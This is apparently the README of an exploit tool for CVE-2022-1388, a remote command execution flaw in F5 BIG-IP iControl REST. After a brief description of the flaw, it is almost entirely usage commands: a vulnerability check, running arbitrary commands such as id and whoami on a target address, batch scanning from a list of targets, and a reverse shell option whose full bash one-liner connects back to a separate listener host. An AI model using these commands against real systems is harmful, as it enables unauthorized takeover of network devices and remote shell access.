
CVE-2022-1388 F5 BIG-IP iControl REST RCE
This vulnerability may allow an unauthenticated attacker with network access to the BIG-IP system through the management port and/or self IP addresses to execute arbitrary system commands, create or delete files, or disable services.
Basic usage
python3 CVE_2022_1388.py

Vuln check
python3 CVE_2022_1388.py -v true -u https://192.168.17.200

command execute:
python3 CVE_2022_1388.py -a true -u https://192.168.17.200/ -c id

python3 CVE_2022_1388.py -a true -u https://192.168.17.200/ -c whoami

batch scan
python3 CVE_2022_1388.py -s true -f check.txt

Reserve Shell
python3 CVE_2022_1388.py -r true -u https://192.168.17.200 -c "bash -i >&/dev/tcp/192.168.17.175/8888 0>&1"

